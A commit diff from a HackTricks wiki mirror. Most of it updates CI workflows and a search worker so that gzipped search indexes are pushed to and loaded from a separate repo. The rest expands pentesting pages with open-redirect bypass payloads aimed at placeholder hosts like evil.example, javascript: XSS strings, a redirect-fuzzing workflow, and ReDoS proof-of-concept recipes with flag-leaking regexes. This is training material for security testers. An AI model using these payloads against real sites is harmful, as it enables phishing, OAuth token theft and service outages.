mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge branch 'master' into update_Q3_2025_s_most_exploited_WordPress_vulnerabilities_20251001_123959
This commit is contained in:
commit
971befe517
106
.github/workflows/build_master.yml
vendored
106
.github/workflows/build_master.yml
vendored
@ -43,7 +43,7 @@ jobs:
|
||||
&& sudo apt update \
|
||||
&& sudo apt install gh -y
|
||||
|
||||
- name: Publish search index release asset
|
||||
- name: Push search index to hacktricks-searchindex repo
|
||||
shell: bash
|
||||
env:
|
||||
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
|
||||
@ -51,43 +51,99 @@ jobs:
|
||||
set -euo pipefail
|
||||
|
||||
ASSET="book/searchindex.js"
|
||||
TAG="searchindex-en"
|
||||
TITLE="Search Index (en)"
|
||||
TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
|
||||
FILENAME="searchindex-en.js"
|
||||
|
||||
if [ ! -f "$ASSET" ]; then
|
||||
echo "Expected $ASSET to exist after build" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
|
||||
TOKEN="${PAT_TOKEN}"
|
||||
if [ -z "$TOKEN" ]; then
|
||||
echo "No token available for GitHub CLI" >&2
|
||||
echo "No PAT_TOKEN available" >&2
|
||||
exit 1
|
||||
fi
|
||||
export GH_TOKEN="$TOKEN"
|
||||
|
||||
# Delete the release if it exists
|
||||
echo "Checking if release $TAG exists..."
|
||||
if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
|
||||
echo "Release $TAG already exists, deleting it..."
|
||||
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
|
||||
echo "Failed to delete release, trying without cleanup-tag..."
|
||||
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
|
||||
echo "Warning: Could not delete existing release, will try to recreate..."
|
||||
}
|
||||
}
|
||||
sleep 2 # Give GitHub API a moment to process the deletion
|
||||
# Clone the searchindex repo
|
||||
git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
|
||||
|
||||
cd /tmp/searchindex-repo
|
||||
git config user.name "GitHub Actions"
|
||||
git config user.email "github-actions@github.com"
|
||||
|
||||
# Compress the searchindex file
|
||||
cd "${GITHUB_WORKSPACE}"
|
||||
gzip -9 -k -f "$ASSET"
|
||||
|
||||
# Show compression stats
|
||||
ORIGINAL_SIZE=$(wc -c < "$ASSET")
|
||||
COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
|
||||
RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
|
||||
echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
|
||||
|
||||
# Copy the .gz version to the searchindex repo
|
||||
cd /tmp/searchindex-repo
|
||||
cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
|
||||
|
||||
# Stage the updated file
|
||||
git add "${FILENAME}.gz"
|
||||
|
||||
# Commit and push with retry logic
|
||||
if git diff --staged --quiet; then
|
||||
echo "No changes to commit"
|
||||
else
|
||||
echo "Release $TAG does not exist, proceeding with creation..."
|
||||
TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
|
||||
git commit -m "Update searchindex files - ${TIMESTAMP}"
|
||||
|
||||
# Retry push up to 20 times with pull --rebase between attempts
|
||||
MAX_RETRIES=20
|
||||
RETRY_COUNT=0
|
||||
while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
|
||||
if git push origin master; then
|
||||
echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
|
||||
break
|
||||
else
|
||||
RETRY_COUNT=$((RETRY_COUNT + 1))
|
||||
if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
|
||||
echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
|
||||
|
||||
# Try normal rebase first
|
||||
if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
|
||||
echo "Rebase successful, retrying push..."
|
||||
else
|
||||
# If rebase fails due to divergent histories (orphan branch reset), re-clone
|
||||
if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
|
||||
echo "Detected history rewrite, re-cloning repository..."
|
||||
cd /tmp
|
||||
rm -rf searchindex-repo
|
||||
git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
|
||||
cd searchindex-repo
|
||||
git config user.name "GitHub Actions"
|
||||
git config user.email "github-actions@github.com"
|
||||
|
||||
# Re-copy the .gz version
|
||||
cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
|
||||
|
||||
git add "${FILENAME}.gz"
|
||||
TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
|
||||
git commit -m "Update searchindex files - ${TIMESTAMP}"
|
||||
echo "Re-cloned and re-committed, will retry push..."
|
||||
else
|
||||
echo "Rebase failed for unknown reason, retrying anyway..."
|
||||
fi
|
||||
fi
|
||||
|
||||
# Create new release (with force flag to overwrite if deletion failed)
|
||||
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
|
||||
echo "Failed to create release, trying with force flag..."
|
||||
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
|
||||
sleep 2
|
||||
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
|
||||
}
|
||||
sleep 1
|
||||
else
|
||||
echo "Failed to push after $MAX_RETRIES attempts"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
done
|
||||
fi
|
||||
|
||||
echo "Successfully pushed searchindex files"
|
||||
|
||||
|
||||
# Login in AWs
|
||||
|
88
.github/workflows/translate_all.yml
vendored
88
.github/workflows/translate_all.yml
vendored
@ -129,7 +129,7 @@ jobs:
|
||||
git pull
|
||||
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
|
||||
|
||||
- name: Publish search index release asset
|
||||
- name: Push search index to hacktricks-searchindex repo
|
||||
shell: bash
|
||||
env:
|
||||
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
|
||||
@ -137,31 +137,93 @@ jobs:
|
||||
set -euo pipefail
|
||||
|
||||
ASSET="book/searchindex.js"
|
||||
TAG="searchindex-${BRANCH}"
|
||||
TITLE="Search Index (${BRANCH})"
|
||||
TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
|
||||
FILENAME="searchindex-${BRANCH}.js"
|
||||
|
||||
if [ ! -f "$ASSET" ]; then
|
||||
echo "Expected $ASSET to exist after build" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
|
||||
TOKEN="${PAT_TOKEN}"
|
||||
if [ -z "$TOKEN" ]; then
|
||||
echo "No token available for GitHub CLI" >&2
|
||||
echo "No PAT_TOKEN available" >&2
|
||||
exit 1
|
||||
fi
|
||||
export GH_TOKEN="$TOKEN"
|
||||
|
||||
# Delete the release if it exists
|
||||
if gh release view "$TAG" >/dev/null 2>&1; then
|
||||
echo "Release $TAG already exists, deleting it..."
|
||||
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
|
||||
# Clone the searchindex repo
|
||||
git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
|
||||
|
||||
# Compress the searchindex file
|
||||
gzip -9 -k -f "$ASSET"
|
||||
|
||||
# Show compression stats
|
||||
ORIGINAL_SIZE=$(wc -c < "$ASSET")
|
||||
COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
|
||||
RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
|
||||
echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
|
||||
|
||||
# Copy ONLY the .gz version to the searchindex repo (no uncompressed .js)
|
||||
cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz"
|
||||
|
||||
# Commit and push with retry logic
|
||||
cd /tmp/searchindex-repo
|
||||
git config user.name "GitHub Actions"
|
||||
git config user.email "github-actions@github.com"
|
||||
git add "${FILENAME}.gz"
|
||||
|
||||
if git diff --staged --quiet; then
|
||||
echo "No changes to commit"
|
||||
else
|
||||
git commit -m "Update ${FILENAME} from hacktricks-cloud build"
|
||||
|
||||
# Retry push up to 20 times with pull --rebase between attempts
|
||||
MAX_RETRIES=20
|
||||
RETRY_COUNT=0
|
||||
while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
|
||||
if git push origin master; then
|
||||
echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
|
||||
break
|
||||
else
|
||||
RETRY_COUNT=$((RETRY_COUNT + 1))
|
||||
if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
|
||||
echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
|
||||
|
||||
# Try normal rebase first
|
||||
if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
|
||||
echo "Rebase successful, retrying push..."
|
||||
else
|
||||
# If rebase fails due to divergent histories (orphan branch reset), re-clone
|
||||
if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
|
||||
echo "Detected history rewrite, re-cloning repository..."
|
||||
cd /tmp
|
||||
rm -rf searchindex-repo
|
||||
git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
|
||||
cd searchindex-repo
|
||||
git config user.name "GitHub Actions"
|
||||
git config user.email "github-actions@github.com"
|
||||
|
||||
# Re-copy ONLY the .gz version (no uncompressed .js)
|
||||
cp "${ASSET}.gz" "${FILENAME}.gz"
|
||||
|
||||
git add "${FILENAME}.gz"
|
||||
git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build"
|
||||
echo "Re-cloned and re-committed, will retry push..."
|
||||
else
|
||||
echo "Rebase failed for unknown reason, retrying anyway..."
|
||||
fi
|
||||
fi
|
||||
|
||||
# Create new release
|
||||
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY"
|
||||
sleep 1
|
||||
else
|
||||
echo "Failed to push after $MAX_RETRIES attempts"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
done
|
||||
fi
|
||||
|
||||
# Login in AWs
|
||||
# Login in AWS
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
|
@ -7,12 +7,23 @@
|
||||
|
||||
### Redirect to localhost or arbitrary domains
|
||||
|
||||
- If the app “allows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target:
|
||||
- IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
|
||||
- IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
|
||||
- Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
|
||||
- Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only “subdomains of X” are allowed but host resolution still points to 127.0.0.1.
|
||||
- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
|
||||
- //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
|
||||
- Userinfo tricks defeat contains/startswith checks against trusted hosts:
|
||||
- https://trusted.tld@attacker.tld/ → browser navigates to attacker.tld but simple string checks “see” trusted.tld.
|
||||
- Backslash parsing confusion between frameworks/browsers:
|
||||
- https://trusted.tld\@attacker.tld → some backends treat “\” as a path char and pass validation; browsers normalize to “/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches.
|
||||
|
||||
{{#ref}}
|
||||
ssrf-server-side-request-forgery/url-format-bypass.md
|
||||
{{#endref}}
|
||||
|
||||
### Open Redirect to XSS
|
||||
### Modern open-redirect to XSS pivots
|
||||
|
||||
```bash
|
||||
#Basic payload, javascript code is executed after "javascript:"
|
||||
@ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29
|
||||
";alert(0);//
|
||||
```
|
||||
|
||||
<details>
|
||||
<summary>More modern URL-based bypass payloads</summary>
|
||||
|
||||
```text
|
||||
# Scheme-relative (current scheme is reused)
|
||||
//evil.example
|
||||
|
||||
# Credentials (userinfo) trick
|
||||
https://trusted.example@evil.example/
|
||||
|
||||
# Backslash confusion (server validates, browser normalizes)
|
||||
https://trusted.example\@evil.example/
|
||||
|
||||
# Schemeless with whitespace/control chars
|
||||
evil.example%00
|
||||
%09//evil.example
|
||||
|
||||
# Prefix/suffix matching flaws
|
||||
https://trusted.example.evil.example/
|
||||
https://evil.example/trusted.example
|
||||
|
||||
# When only path is accepted, try breaking absolute URL detection
|
||||
/\\evil.example
|
||||
/..//evil.example
|
||||
```
|
||||
```
|
||||
</details>
|
||||
|
||||
## Open Redirect uploading svg files
|
||||
|
||||
```html
|
||||
@ -173,18 +212,78 @@ exit;
|
||||
?>
|
||||
```
|
||||
|
||||
## Hunting and exploitation workflow (practical)
|
||||
|
||||
- Single URL check with curl:
|
||||
|
||||
```bash
|
||||
curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
|
||||
```
|
||||
|
||||
- Discover and fuzz likely parameters at scale:
|
||||
|
||||
<details>
|
||||
<summary>Click to expand</summary>
|
||||
|
||||
```bash
|
||||
# 1) Gather historical URLs, keep those with common redirect params
|
||||
cat domains.txt \
|
||||
| gau --o urls.txt # or: waybackurls / katana / hakrawler
|
||||
|
||||
# 2) Grep common parameters and normalize list
|
||||
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
|
||||
| sed 's/\r$//' | sort -u > candidates.txt
|
||||
|
||||
# 3) Use OpenRedireX to fuzz with payload corpus
|
||||
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
|
||||
|
||||
# 4) Manually verify interesting hits
|
||||
awk '/30[1237]|Location:/I' results.txt
|
||||
```
|
||||
```
|
||||
</details>
|
||||
|
||||
- Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect.
|
||||
|
||||
- Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.
|
||||
|
||||
{{#ref}}
|
||||
../network-services-pentesting/pentesting-web/nextjs.md
|
||||
{{#endref}}
|
||||
|
||||
- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide:
|
||||
|
||||
{{#ref}}
|
||||
./oauth-to-account-takeover.md
|
||||
{{#endref}}
|
||||
|
||||
- Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for:
|
||||
|
||||
```html
|
||||
<meta http-equiv="refresh" content="0;url=//evil.example">
|
||||
<script>location = new URLSearchParams(location.search).get('next')</script>
|
||||
```
|
||||
|
||||
## Tools
|
||||
|
||||
- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
|
||||
- OpenRedireX – fuzzer for detecting open redirects. Example:
|
||||
|
||||
## Resources
|
||||
```bash
|
||||
# Install
|
||||
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
|
||||
|
||||
- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.
|
||||
# Fuzz a list of candidate URLs (use FUZZ as placeholder)
|
||||
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect you can find fuzzing lists.
|
||||
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
||||
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
|
||||
|
||||
- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
|
||||
- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad
|
||||
|
||||
## The Problematic Regex Naïve Algorithm
|
||||
|
||||
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
|
||||
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
|
||||
|
||||
### Engine behavior and exploitability
|
||||
|
||||
- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
|
||||
- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.
|
||||
|
||||
## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>
|
||||
|
||||
@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
|
||||
- ([a-zA-Z]+)\*
|
||||
- (a|aa)+
|
||||
- (a|a?)+
|
||||
- (.\*a){x} for x > 10
|
||||
- (.*a){x} for x > 10
|
||||
|
||||
All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
|
||||
|
||||
### Practical recipe to build PoCs
|
||||
|
||||
Most catastrophic cases follow this shape:
|
||||
|
||||
- Prefix that gets you into the vulnerable subpattern (optional).
|
||||
- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
|
||||
- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).
|
||||
|
||||
Minimal examples:
|
||||
|
||||
- `(a+)+$` vs input `"a"*N + "!"`
|
||||
- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`
|
||||
|
||||
Increase N and observe super‑linear growth.
|
||||
|
||||
#### Quick timing harness (Python)
|
||||
|
||||
```python
|
||||
import re, time
|
||||
pat = re.compile(r'(\w*_)\w*$')
|
||||
for n in [2**k for k in range(8, 15)]:
|
||||
s = 'v' + '_'*n + '!'
|
||||
t0=time.time(); pat.search(s); dt=time.time()-t0
|
||||
print(n, f"{dt:.3f}s")
|
||||
```
|
||||
|
||||
## ReDoS Payloads
|
||||
|
||||
### String Exfiltration via ReDoS
|
||||
@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (
|
||||
|
||||
- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
|
||||
- Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
|
||||
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
|
||||
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
|
||||
- In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
|
||||
|
||||
### ReDoS Controlling Input and Regex
|
||||
@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
|
||||
*/
|
||||
```
|
||||
|
||||
### Language/engine notes for attackers
|
||||
|
||||
- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced.
|
||||
- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
|
||||
- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
|
||||
- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.
|
||||
|
||||
## Tools
|
||||
|
||||
- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
|
||||
- Find vulnerable regexes and auto‑generate evil inputs. Examples:
|
||||
- `pip install regexploit`
|
||||
- Analyze one pattern interactively: `regexploit`
|
||||
- Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/`
|
||||
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
|
||||
- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector)
|
||||
- End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
|
||||
- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector)
|
||||
- Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.
|
||||
|
||||
> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS.
|
||||
|
||||
## References
|
||||
|
||||
- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
||||
- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
||||
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
|
||||
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
|
||||
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html)
|
||||
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
|
||||
- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
|
||||
- Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
|
||||
|
||||
> [!TIP]
|
||||
>
|
||||
> - **How can I a page of HackTricks?**
|
||||
> - **How can I reference a page of HackTricks?**
|
||||
|
||||
As long as the link **of** the page(s) where you took the information from appears it's enough.\
|
||||
If you need a bibtex you can use something like:
|
||||
|
@ -21,19 +21,48 @@
|
||||
try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
|
||||
catch { importScripts(abs('/elasticlunr.min.js')); }
|
||||
|
||||
/* 2 — load a single index (remote → local) */
|
||||
/* 2 — decompress gzip data */
|
||||
async function decompressGzip(arrayBuffer){
|
||||
if(typeof DecompressionStream !== 'undefined'){
|
||||
/* Modern browsers: use native DecompressionStream */
|
||||
const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip'));
|
||||
const decompressed = await new Response(stream).arrayBuffer();
|
||||
return new TextDecoder().decode(decompressed);
|
||||
} else {
|
||||
/* Fallback: use pako library */
|
||||
if(typeof pako === 'undefined'){
|
||||
try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); }
|
||||
catch(e){ throw new Error('pako library required for decompression: '+e); }
|
||||
}
|
||||
const uint8Array = new Uint8Array(arrayBuffer);
|
||||
const decompressed = pako.ungzip(uint8Array, {to: 'string'});
|
||||
return decompressed;
|
||||
}
|
||||
}
|
||||
|
||||
/* 3 — load a single index (remote → local) */
|
||||
async function loadIndex(remote, local, isCloud=false){
|
||||
let rawLoaded = false;
|
||||
if(remote){
|
||||
/* Try ONLY compressed version from GitHub (remote already includes .js.gz) */
|
||||
try {
|
||||
const r = await fetch(remote,{mode:'cors'});
|
||||
if (!r.ok) throw new Error('HTTP '+r.status);
|
||||
importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'})));
|
||||
if (r.ok) {
|
||||
const compressed = await r.arrayBuffer();
|
||||
const text = await decompressGzip(compressed);
|
||||
importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'})));
|
||||
rawLoaded = true;
|
||||
} catch(e){ console.warn('remote',remote,'failed →',e); }
|
||||
console.log('Loaded compressed from GitHub:',remote);
|
||||
}
|
||||
} catch(e){ console.warn('compressed GitHub',remote,'failed →',e); }
|
||||
}
|
||||
/* If remote (GitHub) failed, fall back to local uncompressed file */
|
||||
if(!rawLoaded && local){
|
||||
try { importScripts(abs(local)); rawLoaded = true; }
|
||||
try {
|
||||
importScripts(abs(local));
|
||||
rawLoaded = true;
|
||||
console.log('Loaded local fallback:',local);
|
||||
}
|
||||
catch(e){ console.error('local',local,'failed →',e); }
|
||||
}
|
||||
if(!rawLoaded) return null; /* give up on this index */
|
||||
@ -62,26 +91,28 @@
|
||||
return local ? loadIndex(null, local, isCloud) : null;
|
||||
}
|
||||
|
||||
(async () => {
|
||||
const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
|
||||
const lang = htmlLang.split('-')[0];
|
||||
const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download';
|
||||
const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download';
|
||||
let built = [];
|
||||
const MAX = 30, opts = {bool:'AND', expand:true};
|
||||
|
||||
const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
|
||||
const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
|
||||
self.onmessage = async ({data}) => {
|
||||
if(data.type === 'init'){
|
||||
const lang = data.lang || 'en';
|
||||
const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master';
|
||||
|
||||
const MAIN_REMOTE_SOURCES = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`);
|
||||
const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`);
|
||||
/* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */
|
||||
const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz']));
|
||||
const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz']));
|
||||
|
||||
const MAIN_REMOTE_SOURCES = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
|
||||
const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
|
||||
|
||||
const indices = [];
|
||||
const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js', false); if(main) indices.push(main);
|
||||
const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js', true ); if(cloud) indices.push(cloud);
|
||||
|
||||
const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js', false); if(main) indices.push(main);
|
||||
const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js', true ); if(cloud) indices.push(cloud);
|
||||
if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
|
||||
|
||||
/* build index objects */
|
||||
const built = indices.map(d => ({
|
||||
built = indices.map(d => ({
|
||||
idx : elasticlunr.Index.load(d.json),
|
||||
urls: d.urls,
|
||||
cloud: d.cloud,
|
||||
@ -89,9 +120,10 @@
|
||||
}));
|
||||
|
||||
postMessage({ready:true});
|
||||
const MAX = 30, opts = {bool:'AND', expand:true};
|
||||
return;
|
||||
}
|
||||
|
||||
